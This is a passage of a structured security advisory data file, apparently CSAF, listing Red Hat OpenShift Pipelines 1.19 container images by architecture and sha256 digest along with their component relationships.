"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-entrypoint-rhel9@sha256%3A7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845346"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-events-rhel9@sha256%3A8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845294"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-nop-rhel9@sha256%3A5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845253"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-resolvers-rhel9@sha256%3A862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845383"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-sidecarlogresults-rhel9@sha256%3A85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845278"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-webhook-rhel9@sha256%3A9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845382"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-workingdirinit-rhel9@sha256%3Aa8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pruner-controller-rhel9@sha256%3A1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764774996"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-api-rhel9@sha256%3A3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764775225"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-retention-policy-agent-rhel9@sha256%3A2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764775225"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-watcher-rhel9@sha256%3A0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764635259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-controller-rhel9@sha256%3Ac77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769550"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-core-interceptors-rhel9@sha256%3A9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769552"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-eventlistenersink-rhel9@sha256%3Afbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769677"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-webhook-rhel9@sha256%3Afb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769674"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64"
},
